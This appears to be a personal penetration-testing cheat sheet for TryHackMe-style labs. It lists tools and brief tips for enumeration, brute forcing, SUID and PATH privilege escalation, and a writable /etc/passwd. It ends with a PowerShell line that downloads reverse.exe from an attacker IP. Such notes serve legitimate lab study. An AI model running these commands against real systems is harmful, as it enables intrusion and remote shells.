 - Symbols
    - AA = After Access is gained
    - * = 


Things to think about when stuck:
    "Is there anything I can just bruteforce?"
    "What else is open for me to input?"
    "Is the version exploitable? Are there known exploits to this technology?"

---------------------------------------------------------------------------------
---------------------------------------------------------------------------------

Photo Forensics:
    exiftools - to look at photo exif data (meta data)
    binwalk - to extract any embedded files or executables from a photo
    steghide - to hide or decode messages inside images or audio files 

---------------------------------------------------------------------------------
---------------------------------------------------------------------------------

Binary File:
    xxd - to turn a file's binary into hexadecimal completely and dump out the result.

---------------------------------------------------------------------------------
---------------------------------------------------------------------------------

Enumeration:
    
    Swiss Army:
        Metasploit(msfconsole) - Database with interactive shell to run known exploits on targets. 
            * ALWAYS SET LHOST TO BE THM VPN IP!!!!!!!
            * ALWAYS SET THE LHOST, PAYLOAD, AND LPORT WHEN USING METERPRETER SHELL FOR WINDOWS MACHINES
            * On windows, "C:\Windows\Temp" is typically a folder that is world writable.

    ---------------------------------------

    Brute Forcing:
        gobuster - For bruteforcing directories and files on a webserver
        dirbuster - For bruteforcing directories and files on a webserver
        hydra - For bruteforcing usernames and passwords on ssh, http, https, etc.

    ---------------------------------------

    Networking:
        nc (NetCat) - Port listener that will give you control of a port through a terminal among other things 
        nmap - Enumeration essential for scanning ports
        ssh - Secure Shell Protocol with RSA encryption which can be overcome with someone's rsa private key.
            - Sometimes even failing to login-in to SSH can reveal a banner that has some information about how to log in or
            just some sort of additional information.
    
    ---------------------------------------

    Hashing and Cracking:
        john the ripper - useful for many methods of encryption such as RSA Public key encryption.
    
    ---------------------------------------

    Searching:

        Files and Directories:
            dirsearch - Search for a specific directory in a server.
            dirbuster - Bruteforcing application for website directories.

            Samba Servers:
                smbclient - Linux way to interact with SMB.
                    - "-L" To list all shares as an anonymous user.
                    - "-N" To auto-anonymous yourself.
                smbget - Gets files on samba shares as long as a share(nmap script to find), username and password are known.

        Users and Passwords:
            enum4linux - for enumerating from a linux machine onto a Windows or Samba(Windows repurposed) machine
            (AA) linPEAS - Linux priviledge escalation to find possible ways
            to escalate to a non-anonymous user or sudo/root.

    ---------------------------------------

    Proxies and Web:
        Burp Suite - Allows the control and analysis of incoming and outcoming communications/packets.

---------------------------------------------------------------------------------
---------------------------------------------------------------------------------


Priviledge Escalation:

    Things to think about:
        - SUID files
        - Writeable /etc/passwd to make a new superuser
        - Root execution of vi
        - Cronjobs with root user
    
    ---------------------------------------

    *nix:
        /bin/sh - opens a shell (can be useful for SUID programs accessible by a user that is also accessible.

        " find / -perm -u=s -type f 2>/dev/null " - to find all files in the system that have root setting on execution.

        " export PATH=/tmp:$PATH " - For setting a temporary executable in tmp for path variable abuse.

---------------------------------------------------------------------------------
---------------------------------------------------------------------------------

Unix Helpers:

    tee - for piping input and output easily

    ifconfig - for seeing network information and ipaddress

    whoami - See the currnet user's username

    curl (client URL) - Allow arbitrary sending of http requests

    cat - Show the contents of a file

    less - Show the contents of a file

    echo "$SHELL" - Show which shell the user is currently using

    ps -p $$ - Show which shell the user is currently using reliably

    /etc/passwd - Catting/lessing this file will show all the 
    users in the server at the bottom of the list.
    
    /etc/shells - Catting/lessing this file will show all the
    shells available.

    ls -la /etc/passwd - List priviledges from passwd.

    find / -perm -u=s -type f 2>/dev/null - Find SUID files in a linux filesystem for privesc. Read man for details : "You must specify `u', `g' or `o' if you use a symbolic mode."

    lsb_release -a (linux standard base) - Shows short title information about linux distro
    and linux version.


---------------------------------------------------------------------------------
---------------------------------------------------------------------------------

Nmap commands:
    // To see any mounts on a smb server accesible through rpcbind
    nmap -p <rpcbind port> --script=nfs-ls,nfs-statfs,nfs-showmount <ip of where smb is located>

---------------------------------------------------------------------------------
---------------------------------------------------------------------------------

Windows Powershell  (WTF)

    powershell Invoke-WebRequest -Uri http://10.8.30.155:1337/reverse.exe -Outfile reverse.exe - To do a Windows equivalent of a wget with powershell.
        - Make sure you are in a world-writable directory such as C://Windows/Temp/


